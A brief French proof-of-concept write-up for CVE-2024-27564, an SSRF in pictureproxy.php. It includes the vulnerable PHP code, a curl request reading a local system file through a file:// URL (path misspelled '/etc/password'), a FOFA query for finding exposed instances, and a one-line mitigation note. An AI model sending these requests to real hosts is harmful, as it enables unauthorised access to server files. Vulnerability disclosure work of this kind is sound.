
Preuve de concept pour CVE-2024-27564, une SSRF non authentifiée dans pictureproxy.php via le paramètre url, avec le code vulnérable, un PoC curl et des notes d'atténuation.
Une vulnérabilité dans pictureproxy.php permet à des attaquants distants d'effectuer des requêtes arbitraires en injectant des URLs dans le paramètre url. Cette vulnérabilité SSRF peut être exploitée sans authentification, ce qui la rend particulièrement dangereuse.
Le code vulnérable se trouve dans le fichier pictureproxy.php. Le problème survient parce que la fonction ne valide pas correctement le paramètre url. La variable $_GET['url'] est passée à la fonction file_get_contents(), qui récupère le contenu de l'URL spécifiée. Cela peut conduire à une SSRF.
<?php
if (isset($_GET['url'])) {
$image = file_get_contents($_GET['url']);
header("Content-type: image/jpeg");
echo $image;
} else {
echo "Invalid request";
}
Requête Curl :
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password
FOFA= "title="ChatGPT个人专用版""
Une bonne gestion de la validation des entrées est nécessaire.